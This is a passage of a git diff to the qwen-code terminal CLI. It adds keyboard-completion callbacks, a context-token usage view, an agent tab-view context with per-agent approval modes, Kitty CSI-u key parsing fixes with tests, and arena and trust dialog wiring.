diff --git a/packages/cli/src/ui/components/shared/TextInput.tsx b/packages/cli/src/ui/components/shared/TextInput.tsx index 01ebc2fa0..eed7d2a78 100644 --- a/packages/cli/src/ui/components/shared/TextInput.tsx +++ b/packages/cli/src/ui/components/shared/TextInput.tsx @@ -21,6 +21,12 @@ export interface TextInputProps { value: string; onChange: (text: string) => void; onSubmit?: () => void; + /** Called when Tab is pressed; if provided, prevents the default tab-insertion behaviour. */ + onTab?: () => void; + /** Called when ↑ is pressed; if provided, prevents cursor-up in the buffer. */ + onUp?: () => void; + /** Called when ↓ is pressed; if provided, prevents cursor-down in the buffer. */ + onDown?: () => void; placeholder?: string; height?: number; // lines in viewport; >1 enables multiline isActive?: boolean; // when false, ignore keypresses @@ -33,6 +39,9 @@ export function TextInput({ value, onChange, onSubmit, + onTab, + onUp, + onDown, placeholder, height = 1, isActive = true, @@ -68,6 +77,22 @@ export function TextInput({ (key: Key) => { if (!buffer || !isActive) return; + // Tab completion: delegate to caller instead of inserting a tab character + if (key.name === 'tab') { + onTab?.(); + return; + } + + // Arrow-key completion navigation: delegate to caller + if (key.name === 'up' && onUp) { + onUp(); + return; + } + if (key.name === 'down' && onDown) { + onDown(); + return; + } + // Submit on Enter if (keyMatchers[Command.SUBMIT](key) || key.name === 'return') { if (allowMultiline) { diff --git a/packages/cli/src/ui/components/shared/__snapshots__/DescriptiveRadioButtonSelect.test.tsx.snap b/packages/cli/src/ui/components/shared/__snapshots__/DescriptiveRadioButtonSelect.test.tsx.snap index 822b88b0c..5a4505062 100644 --- a/packages/cli/src/ui/components/shared/__snapshots__/DescriptiveRadioButtonSelect.test.tsx.snap +++ b/packages/cli/src/ui/components/shared/__snapshots__/DescriptiveRadioButtonSelect.test.tsx.snap @@ -4,7 +4,7 @@ exports[`DescriptiveRadioButtonSelect > should render correctly with custom prop "▲ 1. Foo Title This is Foo. -● 2. Bar Title +› 2. Bar Title This is Bar. 3. Baz Title This is Baz. @@ -12,7 +12,7 @@ exports[`DescriptiveRadioButtonSelect > should render correctly with custom prop `; exports[`DescriptiveRadioButtonSelect > should render correctly with default props 1`] = ` -"● Foo Title +"› Foo Title This is Foo. Bar Title This is Bar. diff --git a/packages/cli/src/ui/components/shared/text-buffer.ts b/packages/cli/src/ui/components/shared/text-buffer.ts index 369c7fff5..c68bd1a4b 100644 --- a/packages/cli/src/ui/components/shared/text-buffer.ts +++ b/packages/cli/src/ui/components/shared/text-buffer.ts @@ -1907,8 +1907,8 @@ export function useTextBuffer({ else if (key.ctrl && key.name === 'b') move('left'); else if (key.name === 'right' && !key.meta && !key.ctrl) move('right'); else if (key.ctrl && key.name === 'f') move('right'); - else if (key.name === 'up') move('up'); - else if (key.name === 'down') move('down'); + else if (key.name === 'up' && !key.shift) move('up'); + else if (key.name === 'down' && !key.shift) move('down'); else if ((key.ctrl || key.meta) && key.name === 'left') move('wordLeft'); else if (key.meta && key.name === 'b') move('wordLeft'); else if ((key.ctrl || key.meta) && key.name === 'right') diff --git a/packages/cli/src/ui/components/subagents/create/CreationSummary.tsx b/packages/cli/src/ui/components/subagents/create/CreationSummary.tsx index 0cc899b87..58f0cf7d2 100644 --- a/packages/cli/src/ui/components/subagents/create/CreationSummary.tsx +++ b/packages/cli/src/ui/components/subagents/create/CreationSummary.tsx @@ -94,7 +94,7 @@ export function CreationSummary({ } // Check length warnings - if (state.generatedDescription.length > 300) { + if (state.generatedDescription.length > 1000) { allWarnings.push( t('Description is over {{length}} characters', { length: state.generatedDescription.length.toString(), diff --git a/packages/cli/src/ui/components/subagents/runtime/AgentExecutionDisplay.tsx b/packages/cli/src/ui/components/subagents/runtime/AgentExecutionDisplay.tsx index 8f9fe2a6a..8da7a3a24 100644 --- a/packages/cli/src/ui/components/subagents/runtime/AgentExecutionDisplay.tsx +++ b/packages/cli/src/ui/components/subagents/runtime/AgentExecutionDisplay.tsx @@ -8,7 +8,7 @@ import React, { useMemo } from 'react'; import { Box, Text } from 'ink'; import type { TaskResultDisplay, - SubagentStatsSummary, + AgentStatsSummary, Config, } from '@qwen-code/qwen-code-core'; import { theme } from '../../../semantic-colors.js'; @@ -467,7 +467,7 @@ const ExecutionSummaryDetails: React.FC<{ * Tool usage statistics component */ const ToolUsageStats: React.FC<{ - executionSummary?: SubagentStatsSummary; + executionSummary?: AgentStatsSummary; }> = ({ executionSummary }) => { if (!executionSummary) { return ( diff --git a/packages/cli/src/ui/components/views/ContextUsage.tsx b/packages/cli/src/ui/components/views/ContextUsage.tsx new file mode 100644 index 000000000..f6bed1d26 --- /dev/null +++ b/packages/cli/src/ui/components/views/ContextUsage.tsx @@ -0,0 +1,424 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { Box, Text } from 'ink'; +import { theme } from '../../semantic-colors.js'; +import type { + ContextCategoryBreakdown, + ContextToolDetail, + ContextMemoryDetail, + ContextSkillDetail, +} from '../../types.js'; +import { t } from '../../../i18n/index.js'; + +// Progress bar characters +const FILLED = '\u2588'; // █ - filled block +const BUFFER = '\u2592'; // ▒ - medium shade (autocompact buffer) +const EMPTY = '\u2591'; // ░ - light shade (free space) + +const CONTENT_WIDTH = 56; + +interface ContextUsageProps { + modelName: string; + totalTokens: number; + contextWindowSize: number; + breakdown: ContextCategoryBreakdown; + builtinTools: ContextToolDetail[]; + mcpTools: ContextToolDetail[]; + memoryFiles: ContextMemoryDetail[]; + skills: ContextSkillDetail[]; + /** True when totalTokens is estimated (no API call yet) */ + isEstimated?: boolean; + /** When true, show per-item detail breakdowns. Default: false (compact). */ + showDetails?: boolean; +} + +/** + * Truncate a string to maxLen, appending '…' if truncated. + */ +function truncateName(name: string, maxLen: number): string { + if (name.length <= maxLen) return name; + return name.slice(0, maxLen - 1) + '\u2026'; +} + +/** + * Format token count for display (e.g. 1234 -> "1.2k", 123456 -> "123.5k") + */ +function formatTokens(tokens: number): string { + if (tokens >= 1000) { + return `${(tokens / 1000).toFixed(1)}k`; + } + return `${tokens}`; +} + +/** + * Render a three-segment progress bar: used | autocompact buffer | free space. + */ +const ProgressBar: React.FC<{ + usedPercentage: number; + bufferPercentage: number; + width: number; +}> = ({ usedPercentage, bufferPercentage, width }) => { + const usedCount = Math.round((Math.min(usedPercentage, 100) / 100) * width); + const bufferCount = Math.round( + (Math.min(bufferPercentage, 100 - usedPercentage) / 100) * width, + ); + const freeCount = Math.max(0, width - usedCount - bufferCount); + + const usedStr = FILLED.repeat(Math.max(0, usedCount)); + const freeStr = EMPTY.repeat(Math.max(0, freeCount)); + const bufferStr = BUFFER.repeat(Math.max(0, bufferCount)); + + // Used color: accent by default, warning/error at high usage. + let usedColor = theme.text.accent; + if (usedPercentage > 80) { + usedColor = theme.status.error; + } else if (usedPercentage > 60) { + usedColor = theme.status.warning; + } + + return ( + + {usedStr} + {freeStr} + {bufferStr} + + ); +}; + +/** + * A row showing a category with its token count and percentage. + */ +const CategoryRow: React.FC<{ + symbol: string; + label: string; + tokens: number; + contextWindowSize: number; + symbolColor?: string; +}> = ({ symbol, label, tokens, contextWindowSize, symbolColor }) => { + const percentage = ((tokens / contextWindowSize) * 100).toFixed(1); + const tokenStr = `${formatTokens(tokens)} ${t('tokens')} (${percentage}%)`; + + return ( + + + {symbol} + + + {label} + + + {tokenStr} + + + ); +}; + +/** + * A detail row for individual items (MCP tools, memory files, skills). + */ +const DETAIL_NAME_MAX_LEN = 30; + +const DetailRow: React.FC<{ + name: string; + tokens: number; +}> = ({ name, tokens }) => { + const tokenStr = + tokens > 0 ? `${formatTokens(tokens)} ${t('tokens')}` : `0 ${t('tokens')}`; + return ( + + {'\u2514'} + + + {truncateName(name, DETAIL_NAME_MAX_LEN)} + + + + {tokenStr} + + + ); +}; + +export const ContextUsage: React.FC = ({ + modelName, + totalTokens, + contextWindowSize, + breakdown, + builtinTools, + mcpTools, + memoryFiles, + skills, + isEstimated, + showDetails = false, +}) => { + const percentage = + contextWindowSize > 0 ? (totalTokens / contextWindowSize) * 100 : 0; + + // Sort detail items by token count (descending) for better readability + const sortedBuiltinTools = [...builtinTools].sort( + (a, b) => b.tokens - a.tokens, + ); + const sortedMcpTools = [...mcpTools].sort((a, b) => b.tokens - a.tokens); + const sortedMemoryFiles = [...memoryFiles].sort( + (a, b) => b.tokens - a.tokens, + ); + // Sort skills: loaded first, then by total token cost descending + const sortedSkills = [...skills].sort((a, b) => { + if (a.loaded !== b.loaded) return a.loaded ? -1 : 1; + const aTotal = a.tokens + (a.bodyTokens ?? 0); + const bTotal = b.tokens + (b.bodyTokens ?? 0); + return bTotal - aTotal; + }); + + return ( + + {/* Title */} + + {t('Context Usage')} + + + + {isEstimated ? ( + <> + {/* No API data yet — show hint instead of progress bar */} + + + {t('No API response yet. Send a message to see actual usage.')} + + + + {/* Estimated overhead categories */} + + {t('Estimated pre-conversation overhead')} + + + {t('Model')}: {modelName} + {' '} + {t('Context window')}: {formatTokens(contextWindowSize)}{' '} + {t('tokens')} + + + + ) : ( + <> + {/* Model name + context window info */} + + + {t('Model')}: {modelName} + + + + {t('Context window')}: {formatTokens(contextWindowSize)}{' '} + {t('tokens')} + + + + {/* Progress bar — three segments: used | free | buffer */} + + 0 + ? (breakdown.autocompactBuffer / contextWindowSize) * 100 + : 0 + } + width={CONTENT_WIDTH} + /> + + + {/* Legend — same layout as CategoryRow for alignment */} + + + + + + {/* Breakdown header */} + + {t('Usage by category')} + + + )} + + + + {breakdown.mcpTools > 0 && ( + + )} + + + {/* Only show Messages when we have real API data */} + {!isEstimated && ( + + )} + + {showDetails ? ( + <> + {/* Built-in tools detail */} + {sortedBuiltinTools.length > 0 && ( + + + {t('Built-in tools')} + + {sortedBuiltinTools.map((tool) => ( + + ))} + + )} + + {/* MCP Tools detail */} + {sortedMcpTools.length > 0 && ( + + + {t('MCP tools')} + + {sortedMcpTools.map((tool) => ( + + ))} + + )} + + {/* Memory files detail */} + {sortedMemoryFiles.length > 0 && ( + + + {t('Memory files')} + + {sortedMemoryFiles.map((file) => ( + + ))} + + )} + + {/* Skills detail */} + {sortedSkills.length > 0 && ( + + + {t('Skills')} + + {sortedSkills.map((skill) => ( + + + {'\u2514'} + + + {truncateName(skill.name, DETAIL_NAME_MAX_LEN)} + + {skill.loaded && ( + {t('active')} + )} + + + + {formatTokens(skill.tokens)} {t('tokens')} + + + + {skill.loaded && + skill.bodyTokens != null && + skill.bodyTokens > 0 && ( + + {' \u2514'} + + + {t('body loaded')} + + + + + +{formatTokens(skill.bodyTokens)} {t('tokens')} + + + + )} + + ))} + + )} + + ) : ( + + + {t('Run /context detail for per-item breakdown.')} + + + )} + + ); +}; diff --git a/packages/cli/src/ui/contexts/AgentViewContext.tsx b/packages/cli/src/ui/contexts/AgentViewContext.tsx new file mode 100644 index 000000000..b2c35e6d3 --- /dev/null +++ b/packages/cli/src/ui/contexts/AgentViewContext.tsx @@ -0,0 +1,308 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentViewContext — React context for in-process agent view switching. + * + * Tracks which view is active (main or an agent tab) and the set of registered + * AgentInteractive instances. Consumed by AgentTabBar, AgentChatView, and + * DefaultAppLayout to implement tab-based agent navigation. + * + * Kept separate from UIStateContext to avoid bloating the main state with + * in-process-only concerns and to make the feature self-contained. + */ + +import { + createContext, + useContext, + useCallback, + useMemo, + useState, +} from 'react'; +import { + type AgentInteractive, + type ApprovalMode, + type Config, +} from '@qwen-code/qwen-code-core'; +import { useArenaInProcess } from '../hooks/useArenaInProcess.js'; + +// ─── Types ────────────────────────────────────────────────── + +export interface RegisteredAgent { + interactiveAgent: AgentInteractive; + /** Model identifier shown in tabs and paths (e.g. "glm-5"). */ + modelId: string; + /** Human-friendly model name (e.g. "GLM 5"). */ + modelName?: string; + color: string; +} + +export interface AgentViewState { + /** 'main' or an agentId */ + activeView: string; + /** Registered in-process agents keyed by agentId */ + agents: ReadonlyMap; + /** Whether any agent tab's embedded shell currently has input focus. */ + agentShellFocused: boolean; + /** Current text in the active agent tab's input buffer (empty when on main). */ + agentInputBufferText: string; + /** Whether the tab bar has keyboard focus (vs the agent input). */ + agentTabBarFocused: boolean; + /** Per-agent approval modes (keyed by agentId). */ + agentApprovalModes: ReadonlyMap; +} + +export interface AgentViewActions { + switchToMain(): void; + switchToAgent(agentId: string): void; + switchToNext(): void; + switchToPrevious(): void; + registerAgent( + agentId: string, + interactiveAgent: AgentInteractive, + modelId: string, + color: string, + modelName?: string, + ): void; + unregisterAgent(agentId: string): void; + unregisterAll(): void; + setAgentShellFocused(focused: boolean): void; + setAgentInputBufferText(text: string): void; + setAgentTabBarFocused(focused: boolean): void; + setAgentApprovalMode(agentId: string, mode: ApprovalMode): void; +} + +// ─── Context ──────────────────────────────────────────────── + +const AgentViewStateContext = createContext(null); +const AgentViewActionsContext = createContext(null); + +// ─── Defaults (used when no provider is mounted) ──────────── + +const DEFAULT_STATE: AgentViewState = { + activeView: 'main', + agents: new Map(), + agentShellFocused: false, + agentInputBufferText: '', + agentTabBarFocused: false, + agentApprovalModes: new Map(), +}; + +const noop = () => {}; + +const DEFAULT_ACTIONS: AgentViewActions = { + switchToMain: noop, + switchToAgent: noop, + switchToNext: noop, + switchToPrevious: noop, + registerAgent: noop, + unregisterAgent: noop, + unregisterAll: noop, + setAgentShellFocused: noop, + setAgentInputBufferText: noop, + setAgentTabBarFocused: noop, + setAgentApprovalMode: noop, +}; + +// ─── Hook: useAgentViewState ──────────────────────────────── + +export function useAgentViewState(): AgentViewState { + return useContext(AgentViewStateContext) ?? DEFAULT_STATE; +} + +// ─── Hook: useAgentViewActions ────────────────────────────── + +export function useAgentViewActions(): AgentViewActions { + return useContext(AgentViewActionsContext) ?? DEFAULT_ACTIONS; +} + +// ─── Provider ─────────────────────────────────────────────── + +interface AgentViewProviderProps { + config?: Config; + children: React.ReactNode; +} + +export function AgentViewProvider({ + config, + children, +}: AgentViewProviderProps) { + const [activeView, setActiveView] = useState('main'); + const [agents, setAgents] = useState>( + () => new Map(), + ); + const [agentShellFocused, setAgentShellFocused] = useState(false); + const [agentInputBufferText, setAgentInputBufferText] = useState(''); + const [agentTabBarFocused, setAgentTabBarFocused] = useState(false); + const [agentApprovalModes, setAgentApprovalModes] = useState< + Map + >(() => new Map()); + + // ── Navigation ── + + const switchToMain = useCallback(() => { + setActiveView('main'); + setAgentTabBarFocused(false); + }, []); + + const switchToAgent = useCallback( + (agentId: string) => { + if (agents.has(agentId)) { + setActiveView(agentId); + } + }, + [agents], + ); + + const switchToNext = useCallback(() => { + const ids = ['main', ...agents.keys()]; + const currentIndex = ids.indexOf(activeView); + const nextIndex = (currentIndex + 1) % ids.length; + setActiveView(ids[nextIndex]!); + }, [agents, activeView]); + + const switchToPrevious = useCallback(() => { + const ids = ['main', ...agents.keys()]; + const currentIndex = ids.indexOf(activeView); + const prevIndex = (currentIndex - 1 + ids.length) % ids.length; + setActiveView(ids[prevIndex]!); + }, [agents, activeView]); + + // ── Registration ── + + const registerAgent = useCallback( + ( + agentId: string, + interactiveAgent: AgentInteractive, + modelId: string, + color: string, + modelName?: string, + ) => { + setAgents((prev) => { + const next = new Map(prev); + next.set(agentId, { + interactiveAgent, + modelId, + color, + modelName, + }); + return next; + }); + // Seed approval mode from the agent's own config + const mode = interactiveAgent.getCore().runtimeContext.getApprovalMode(); + setAgentApprovalModes((prev) => { + const next = new Map(prev); + next.set(agentId, mode); + return next; + }); + }, + [], + ); + + const unregisterAgent = useCallback((agentId: string) => { + setAgents((prev) => { + if (!prev.has(agentId)) return prev; + const next = new Map(prev); + next.delete(agentId); + return next; + }); + setAgentApprovalModes((prev) => { + if (!prev.has(agentId)) return prev; + const next = new Map(prev); + next.delete(agentId); + return next; + }); + setActiveView((current) => (current === agentId ? 'main' : current)); + }, []); + + const unregisterAll = useCallback(() => { + setAgents(new Map()); + setAgentApprovalModes(new Map()); + setActiveView('main'); + setAgentTabBarFocused(false); + }, []); + + const setAgentApprovalMode = useCallback( + (agentId: string, mode: ApprovalMode) => { + // Update the agent's runtime config so tool scheduling picks it up + const agent = agents.get(agentId); + if (agent) { + agent.interactiveAgent.getCore().runtimeContext.setApprovalMode(mode); + } + // Update UI state + setAgentApprovalModes((prev) => { + const next = new Map(prev); + next.set(agentId, mode); + return next; + }); + }, + [agents], + ); + + // ── Memoized values ── + + const state: AgentViewState = useMemo( + () => ({ + activeView, + agents, + agentShellFocused, + agentInputBufferText, + agentTabBarFocused, + agentApprovalModes, + }), + [ + activeView, + agents, + agentShellFocused, + agentInputBufferText, + agentTabBarFocused, + agentApprovalModes, + ], + ); + + const actions: AgentViewActions = useMemo( + () => ({ + switchToMain, + switchToAgent, + switchToNext, + switchToPrevious, + registerAgent, + unregisterAgent, + unregisterAll, + setAgentShellFocused, + setAgentInputBufferText, + setAgentTabBarFocused, + setAgentApprovalMode, + }), + [ + switchToMain, + switchToAgent, + switchToNext, + switchToPrevious, + registerAgent, + unregisterAgent, + unregisterAll, + setAgentShellFocused, + setAgentInputBufferText, + setAgentTabBarFocused, + setAgentApprovalMode, + ], + ); + + // ── Arena in-process bridge ── + // Bridge arena manager events to agent registration. The hook is kept + // in its own file for separation of concerns; it's called here so the + // provider is the single owner of agent tab lifecycle. + useArenaInProcess(config ?? null, actions); + + return ( + + + {children} + + + ); +} diff --git a/packages/cli/src/ui/contexts/KeypressContext.test.tsx b/packages/cli/src/ui/contexts/KeypressContext.test.tsx index edf25bead..b662ec7ed 100644 --- a/packages/cli/src/ui/contexts/KeypressContext.test.tsx +++ b/packages/cli/src/ui/contexts/KeypressContext.test.tsx @@ -1367,6 +1367,75 @@ describe('KeypressContext - Kitty Protocol', () => { }), ); }); + + it('drops unsupported Kitty CSI-u keys without blocking later input', () => { + const keyHandler = vi.fn(); + const { result } = renderHook(() => useKeypressContext(), { wrapper }); + act(() => result.current.subscribe(keyHandler)); + + act(() => stdin.sendKittySequence(`\x1b[57358u`)); // CAPS_LOCK + act(() => + stdin.pressKey({ + name: 'a', + ctrl: false, + meta: false, + shift: false, + paste: false, + sequence: 'a', + }), + ); + + expect(keyHandler).toHaveBeenCalledTimes(1); + expect(keyHandler).toHaveBeenCalledWith( + expect.objectContaining({ + name: 'a', + sequence: 'a', + }), + ); + }); + + it('recovers plain text that arrives in the same chunk after an unsupported CSI-u key', () => { + const keyHandler = vi.fn(); + const { result } = renderHook(() => useKeypressContext(), { wrapper }); + act(() => result.current.subscribe(keyHandler)); + + act(() => + stdin.pressKey({ + name: '', + ctrl: false, + meta: false, + shift: false, + paste: false, + sequence: '\x1b[57358ua', + }), + ); + + expect(keyHandler).toHaveBeenCalledTimes(1); + expect(keyHandler).toHaveBeenCalledWith( + expect.objectContaining({ + name: 'a', + sequence: 'a', + kittyProtocol: true, + }), + ); + }); + + it('drops unsupported CSI-u variants with event metadata and keeps parsing', () => { + const keyHandler = vi.fn(); + const { result } = renderHook(() => useKeypressContext(), { wrapper }); + act(() => result.current.subscribe(keyHandler)); + + act(() => stdin.sendKittySequence(`\x1b[57358;1:1u\x1b[100u`)); + + expect(keyHandler).toHaveBeenCalledTimes(1); + expect(keyHandler).toHaveBeenCalledWith( + expect.objectContaining({ + name: 'd', + sequence: 'd', + kittyProtocol: true, + }), + ); + }); }); describe('Kitty keypad private-use keys', () => { diff --git a/packages/cli/src/ui/contexts/KeypressContext.tsx b/packages/cli/src/ui/contexts/KeypressContext.tsx index 791602f6a..97db27563 100644 --- a/packages/cli/src/ui/contexts/KeypressContext.tsx +++ b/packages/cli/src/ui/contexts/KeypressContext.tsx @@ -178,6 +178,25 @@ export function KeypressProvider({ let rawDataBuffer = Buffer.alloc(0); let rawFlushTimeout: NodeJS.Timeout | null = null; + const createPrintableKey = (char: string): Key => { + const printableName = + char === ' ' + ? 'space' + : /^[A-Za-z]$/.test(char) + ? char.toLowerCase() + : char; + + return { + name: printableName, + ctrl: false, + meta: false, + shift: false, + paste: false, + sequence: char, + kittyProtocol: true, + }; + }; + // Parse a single complete kitty sequence from the start (prefix) of the // buffer and return both the Key and the number of characters consumed. // This lets us "peel off" one complete event when multiple sequences arrive @@ -415,22 +434,11 @@ export function KeypressProvider({ keyCode <= 0x10ffff && !(keyCode >= 0xe000 && keyCode <= 0xf8ff) ) { - const char = String.fromCodePoint(keyCode); - const printableName = - char === ' ' - ? 'space' - : /^[A-Za-z]$/.test(char) - ? char.toLowerCase() - : char; return { key: { - name: printableName, - ctrl: false, + ...createPrintableKey(String.fromCodePoint(keyCode)), meta: alt, shift, - paste: false, - sequence: char, - kittyProtocol: true, }, length: m[0].length, }; @@ -490,6 +498,42 @@ export function KeypressProvider({ return null; }; + const getCompleteCsiSequenceLength = (buffer: string): number | null => { + if (!buffer.startsWith(`${ESC}[`)) { + return null; + } + + for (let i = 2; i < buffer.length; i++) { + const code = buffer.charCodeAt(i); + if (code >= 0x40 && code <= 0x7e) { + return i + 1; + } + if (code < 0x20 || code > 0x3f) { + return 0; + } + } + + return null; + }; + + const parsePlainTextPrefix = ( + buffer: string, + ): { key: Key; length: number } | null => { + if (!buffer || buffer.startsWith(ESC)) { + return null; + } + + const [char] = Array.from(buffer); + if (!char) { + return null; + } + + return { + key: createPrintableKey(char), + length: char.length, + }; + }; + const broadcast = (key: Key) => { for (const handler of subscribers) { handler(key); @@ -653,47 +697,82 @@ export function KeypressProvider({ // start of the buffer. This handles batched inputs cleanly. If the // prefix is incomplete or invalid, skip to the next CSI introducer // (ESC[) so that a following valid sequence can still be parsed. - let parsedAny = false; + let bufferedInputHandled = false; while (kittySequenceBuffer) { const parsed = parseKittyPrefix(kittySequenceBuffer); - if (!parsed) { - // Look for the next potential CSI start beyond index 0 - const nextStart = kittySequenceBuffer.indexOf(`${ESC}[`, 1); - if (nextStart > 0) { - if (debugKeystrokeLogging) { + if (parsed) { + if (debugKeystrokeLogging) { + const parsedSequence = kittySequenceBuffer.slice( + 0, + parsed.length, + ); + if (kittySequenceBuffer.length > parsed.length) { debugLogger.debug( - '[DEBUG] Skipping incomplete/invalid CSI prefix:', - kittySequenceBuffer.slice(0, nextStart), + '[DEBUG] Kitty sequence parsed successfully (prefix):', + parsedSequence, + ); + } else { + debugLogger.debug( + '[DEBUG] Kitty sequence parsed successfully:', + parsedSequence, ); } - kittySequenceBuffer = kittySequenceBuffer.slice(nextStart); - continue; } - break; + // Consume the parsed prefix and broadcast it. + kittySequenceBuffer = kittySequenceBuffer.slice(parsed.length); + broadcast(parsed.key); + bufferedInputHandled = true; + continue; } - if (debugKeystrokeLogging) { - const parsedSequence = kittySequenceBuffer.slice( - 0, - parsed.length, + + const completeUnsupportedCsiLength = + getCompleteCsiSequenceLength(kittySequenceBuffer); + if (completeUnsupportedCsiLength) { + if (debugKeystrokeLogging) { + debugLogger.debug( + '[DEBUG] Dropping unsupported complete CSI sequence:', + kittySequenceBuffer.slice(0, completeUnsupportedCsiLength), + ); + } + kittySequenceBuffer = kittySequenceBuffer.slice( + completeUnsupportedCsiLength, ); - if (kittySequenceBuffer.length > parsed.length) { + bufferedInputHandled = true; + continue; + } + + const plainTextPrefix = parsePlainTextPrefix(kittySequenceBuffer); + if (plainTextPrefix) { + if (debugKeystrokeLogging) { debugLogger.debug( - '[DEBUG] Kitty sequence parsed successfully (prefix):', - parsedSequence, - ); - } else { - debugLogger.debug( - '[DEBUG] Kitty sequence parsed successfully:', - parsedSequence, + '[DEBUG] Recovered plain text after kitty sequence:', + plainTextPrefix.key.sequence, ); } + kittySequenceBuffer = kittySequenceBuffer.slice( + plainTextPrefix.length, + ); + broadcast(plainTextPrefix.key); + bufferedInputHandled = true; + continue; } - // Consume the parsed prefix and broadcast it. - kittySequenceBuffer = kittySequenceBuffer.slice(parsed.length); - broadcast(parsed.key); - parsedAny = true; + + // Look for the next potential CSI start beyond index 0 + const nextStart = kittySequenceBuffer.indexOf(`${ESC}[`, 1); + if (nextStart > 0) { + if (debugKeystrokeLogging) { + debugLogger.debug( + '[DEBUG] Skipping incomplete/invalid CSI prefix:', + kittySequenceBuffer.slice(0, nextStart), + ); + } + kittySequenceBuffer = kittySequenceBuffer.slice(nextStart); + bufferedInputHandled = true; + continue; + } + break; } - if (parsedAny) return; + if (bufferedInputHandled) return; if (config?.getDebugMode() || debugKeystrokeLogging) { const codes = Array.from(kittySequenceBuffer).map((ch) => diff --git a/packages/cli/src/ui/contexts/UIActionsContext.tsx b/packages/cli/src/ui/contexts/UIActionsContext.tsx index 19464cccc..8604e6744 100644 --- a/packages/cli/src/ui/contexts/UIActionsContext.tsx +++ b/packages/cli/src/ui/contexts/UIActionsContext.tsx @@ -17,6 +17,7 @@ import { import { type SettingScope } from '../../config/settings.js'; import { type CodingPlanRegion } from '../../constants/codingPlan.js'; import type { AuthState } from '../types.js'; +import { type ArenaDialogType } from '../hooks/useArenaCommand.js'; // OpenAICredentials type (previously imported from OpenAIKeyPrompt) export interface OpenAICredentials { apiKey: string; @@ -54,7 +55,11 @@ export interface UIActions { exitEditorDialog: () => void; closeSettingsDialog: () => void; closeModelDialog: () => void; + openArenaDialog: (type: Exclude) => void; + closeArenaDialog: () => void; + handleArenaModelsSelected?: (models: string[]) => void; dismissCodingPlanUpdate: () => void; + closeTrustDialog: () => void; closePermissionsDialog: () => void; setShellModeActive: (value: boolean) => void; vimHandleInput: (key: Key) => boolean; diff --git a/packages/cli/src/ui/contexts/UIStateContext.tsx b/packages/cli/src/ui/contexts/UIStateContext.tsx index 7f2e25ec7..03bda1e58 100644 --- a/packages/cli/src/ui/contexts/UIStateContext.tsx +++ b/packages/cli/src/ui/contexts/UIStateContext.tsx @@ -34,6 +34,7 @@ import type { UpdateObject } from '../utils/updateCheck.js'; import { type UseHistoryManagerReturn } from '../hooks/useHistoryManager.js'; import { type RestartReason } from '../hooks/useIdeTrustListener.js'; import { type CodingPlanUpdateRequest } from '../hooks/useCodingPlanUpdates.js'; +import { type ArenaDialogType } from '../hooks/useArenaCommand.js'; export interface UIState { history: HistoryItem[]; @@ -53,6 +54,8 @@ export interface UIState { quittingMessages: HistoryItem[] | null; isSettingsDialogOpen: boolean; isModelDialogOpen: boolean; + isTrustDialogOpen: boolean; + activeArenaDialog: ArenaDialogType; isPermissionsDialogOpen: boolean; isApprovalModeDialogOpen: boolean; isResumeDialogOpen: boolean; @@ -135,6 +138,8 @@ export interface UIState { isMcpDialogOpen: boolean; // Feedback dialog isFeedbackDialogOpen: boolean; + // Per-task token tracking + taskStartTokens: number; } export const UIStateContext = createContext(null); diff --git a/packages/cli/src/ui/hooks/slashCommandProcessor.test.ts b/packages/cli/src/ui/hooks/slashCommandProcessor.test.ts index c48653970..49cefb39c 100644 --- a/packages/cli/src/ui/hooks/slashCommandProcessor.test.ts +++ b/packages/cli/src/ui/hooks/slashCommandProcessor.test.ts @@ -156,6 +156,7 @@ describe('useSlashCommandProcessor', () => { openEditorDialog: vi.fn(), openSettingsDialog: vi.fn(), openModelDialog: mockOpenModelDialog, + openTrustDialog: vi.fn(), openPermissionsDialog: vi.fn(), openApprovalModeDialog: vi.fn(), openResumeDialog: vi.fn(), @@ -929,6 +930,7 @@ describe('useSlashCommandProcessor', () => { openEditorDialog: vi.fn(), openSettingsDialog: vi.fn(), openModelDialog: vi.fn(), + openTrustDialog: vi.fn(), openPermissionsDialog: vi.fn(), openApprovalModeDialog: vi.fn(), openResumeDialog: vi.fn(), diff --git a/packages/cli/src/ui/hooks/slashCommandProcessor.ts b/packages/cli/src/ui/hooks/slashCommandProcessor.ts index bcdeaa34c..35050623b 100644 --- a/packages/cli/src/ui/hooks/slashCommandProcessor.ts +++ b/packages/cli/src/ui/hooks/slashCommandProcessor.ts @@ -7,6 +7,7 @@ import { useCallback, useMemo, useEffect, useRef, useState } from 'react'; import { type PartListUnion } from '@google/genai'; import type { UseHistoryManagerReturn } from './useHistoryManager.js'; +import type { ArenaDialogType } from './useArenaCommand.js'; import { type Logger, type Config, @@ -68,10 +69,12 @@ const SLASH_COMMANDS_SKIP_RECORDING = new Set([ interface SlashCommandProcessorActions { openAuthDialog: () => void; + openArenaDialog?: (type: Exclude) => void; openThemeDialog: () => void; openEditorDialog: () => void; openSettingsDialog: () => void; openModelDialog: () => void; + openTrustDialog: () => void; openPermissionsDialog: () => void; openApprovalModeDialog: () => void; openResumeDialog: () => void; @@ -475,6 +478,18 @@ export const useSlashCommandProcessor = ( return { type: 'handled' }; case 'dialog': switch (result.dialog) { + case 'arena_start': + actions.openArenaDialog?.('start'); + return { type: 'handled' }; + case 'arena_select': + actions.openArenaDialog?.('select'); + return { type: 'handled' }; + case 'arena_stop': + actions.openArenaDialog?.('stop'); + return { type: 'handled' }; + case 'arena_status': + actions.openArenaDialog?.('status'); + return { type: 'handled' }; case 'auth': actions.openAuthDialog(); return { type: 'handled' }; @@ -490,6 +505,9 @@ export const useSlashCommandProcessor = ( case 'model': actions.openModelDialog(); return { type: 'handled' }; + case 'trust': + actions.openTrustDialog(); + return { type: 'handled' }; case 'permissions': actions.openPermissionsDialog(); return { type: 'handled' }; diff --git a/packages/cli/src/ui/hooks/useAgentStreamingState.ts b/packages/cli/src/ui/hooks/useAgentStreamingState.ts new file mode 100644 index 000000000..881f715b2 --- /dev/null +++ b/packages/cli/src/ui/hooks/useAgentStreamingState.ts @@ -0,0 +1,166 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Hook that subscribes to an AgentInteractive's events and + * derives streaming state, elapsed time, input-active flag, and status. + * + * Extracts the common reactivity + derived-state pattern shared by + * AgentComposer and AgentChatView so each component only deals with + * layout and interaction. + */ + +import { useState, useEffect, useCallback, useMemo, useRef 